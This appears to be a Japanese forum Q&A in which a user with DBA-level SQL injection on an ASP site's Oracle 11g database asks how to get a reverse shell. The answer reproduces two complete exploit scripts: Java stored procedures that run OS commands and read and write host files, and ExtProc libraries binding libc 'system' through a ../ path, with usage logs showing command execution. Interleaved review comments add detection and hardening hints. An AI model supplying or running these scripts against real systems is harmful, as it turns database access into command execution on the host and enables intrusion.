
Oracle SQLインジェクションリバースシェル

ASPコードを使用するWebサイトでSQLインジェクションをテストしています。すべてのデータベースとテーブルを正常に取得できており、現在のユーザーはDBA権限を持っています。このSQLインジェクションからリバースシェルを取得するにはどうすればよいですか?Oracleのバージョンは「Oracle Database 11g Enterprise Edition Release 11.1.0.7.0」です。

user1968957

Oracle DBMSでコードを実行する次の2つの方法を試すことができます。なお、どちらのスクリプトの使用例も、sqlplusでsysdbaとして直接接続した場合のものです。

最初はJavaコード: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql

-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_Java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r--   1 Oracle   system        45 Nov 22 12:20 mytest
-- -rw-r--r--   1 Oracle   system      1645 Nov 22 12:20 aaa
-- -rw-r--r--   1 Oracle   system      8267 Nov 22 12:20 bbb
-- [...]
--

-- Defines the Java class "oraexec" inside the database. Its three static
-- methods are the targets of the javacmd, javareadfile and javawritefile
-- call specifications that follow in this script.
-- NOTE(review): the usage listing shows the files produced by these calls
-- owned by the Oracle OS account, so a database account that can create and
-- call this class effectively holds command and file access on the host
-- with that account's rights.
-- NOTE(review): for detection, look for unexpected JAVA SOURCE / JAVA CLASS
-- objects in DBA_OBJECTS and review Java permission grants in
-- DBA_JAVA_POLICY - confirm the exact checks for the deployed release.
create or replace and resolve Java source named "oraexec" as
import Java.lang.*;
import Java.io.*;
public class oraexec
{
    /*
     * Command execution module.
     * Hands the given string to Runtime.exec. The returned Process object
     * is discarded, so the caller gets no output and no exit status, and
     * the call does not wait for the command to finish.
     */
    public static void execCommand(String command) throws IOException
    {
        Runtime.getRuntime().exec(command);
    }

    /*
     * File reading module.
     * Reads the named file line by line and prints each line to System.out.
     * The usage notes enable dbms_Java.set_output and serveroutput before
     * calling it, which is how the lines reach the SQL session.
     */
    public static void readFile(String filename) throws IOException
    {
        FileReader f = new FileReader(filename);
        BufferedReader fr = new BufferedReader(f);
        String text = fr.readLine();
        while (text != null) {
            System.out.println(text);
            text = fr.readLine();
        }
        /* closed only on the normal path - an IOException above skips this */
        fr.close();
    }

    /*
     * File writing module.
     * Appends one line, followed by a newline, to the named file. The file
     * is opened in append mode, so existing content is kept.
     */
    public static void writeFile(String filename, String line) throws IOException
    {
        FileWriter f = new FileWriter(filename, true); /* append */
        BufferedWriter fw = new BufferedWriter(f);
        fw.write(line);
        fw.write("\n");
        fw.close();
    }
}
/

-- usage: exec javacmd('command');
-- Call specification: publishes oraexec.execCommand as the PL/SQL procedure
-- javacmd, so the string in p_command is passed to Runtime.exec.
-- NOTE(review): a procedure whose call spec maps to a Java method that runs
-- OS commands is worth flagging in any review of stored objects - restrict
-- who may create procedures and Java sources, and audit their creation.
create or replace procedure javacmd(p_command varchar2) as
language Java           
name 'oraexec.execCommand(Java.lang.String)';
/

-- usage: exec dbms_Java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
-- Call specification: publishes oraexec.readFile as the PL/SQL procedure
-- javareadfile. The file named by p_filename is read on the database host
-- and its lines are printed to the Java output stream.
-- NOTE(review): which files are readable depends on the Java file
-- permissions granted to the calling schema - verify these grants are
-- limited to what applications actually need.
create or replace procedure javareadfile(p_filename in varchar2) as
language Java
name 'oraexec.readFile(Java.lang.String)';
/

-- usage: exec javawritefile('/path/to/file', 'line to append');
-- Call specification: publishes oraexec.writeFile as the PL/SQL procedure
-- javawritefile. p_line plus a newline is appended to the file named by
-- p_filename on the database host.
-- NOTE(review): write access to arbitrary host paths from SQL is a
-- persistence and tampering risk - Java write permissions should be scoped
-- to specific directories, not granted broadly.
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language Java
name 'oraexec.writeFile(Java.lang.String, Java.lang.String)';
/

2番目はExtProcを使用しています: http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql (使用例のログはOracle9i 9.2.0.1.0で取得されたものであり、質問にある11.1.0.7.0で同じ動作になるかは確認が必要です。)

-- Usage example:
-- $ echo $Oracle_HOME
-- /opt/Oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/Oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 Oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit Oracle releases
-- Registers a 32-bit system C library as an external-procedure library.
-- The path begins under the Oracle home's bin directory and then climbs
-- with ../ segments toward the filesystem root to name lib/32/libc.so.1.
-- NOTE(review): a library path that contains ../ and resolves outside the
-- Oracle home is a strong indicator to alert on when reviewing
-- DBA_LIBRARIES. Limiting the CREATE LIBRARY privileges and restricting
-- which libraries extproc may load (for example via EXTPROC_DLLS) are the
-- usual controls - confirm the specifics for the release in use.
create or replace library exec_Shell32 as
'$Oracle_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit Oracle releases
-- 64-bit counterpart of exec_Shell32: the same ../ path construction, but
-- naming lib/64/libc.so.1. The usage log shows the 32-bit library failing
-- with ORA-06520 / "wrong ELF class" on a 64-bit install, while the 64-bit
-- one loads.
-- NOTE(review): the same review points apply - library definitions that
-- point at a system libc rather than an application library should be
-- treated as suspicious.
create or replace library exec_Shell64 as
'$Oracle_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit Oracle releases
-- usage: exec oracmd32.exec('command');
-- Package specification: exposes a single procedure, exec, taking the
-- command string as its only argument.
create or replace package oracmd32 as
    procedure exec(cmdstring in char);
end oracmd32;
/
-- Package body: exec is declared as an external C procedure bound to the
-- symbol "system" in the exec_Shell32 library, so cmdstring is handed to
-- that C function through the external procedure mechanism.
-- NOTE(review): the usage log shows the resulting file owned by the Oracle
-- OS account. An external procedure mapped to "system" is not something a
-- normal application needs and should be treated as a finding.
create or replace package body oracmd32 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_Shell32
    language c;
end oracmd32;
/

-- package for 64-bit Oracle releases
-- usage: exec oracmd64.exec('command');
-- Package specification: 64-bit counterpart of oracmd32, exposing the same
-- single procedure exec(cmdstring).
create or replace package oracmd64 as
    procedure exec(cmdstring in char);
end oracmd64;
/
-- Package body: exec is an external C procedure bound to the symbol
-- "system" in the exec_Shell64 library. In the usage log this is the
-- variant that succeeds on the 64-bit install.
-- NOTE(review): if external procedures are not required, disabling the
-- extproc agent removes this path entirely - otherwise audit package and
-- library creation and keep library privileges away from application
-- accounts.
create or replace package body oracmd64 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_Shell64
    language c;
end oracmd64;
/
Cristian Dobre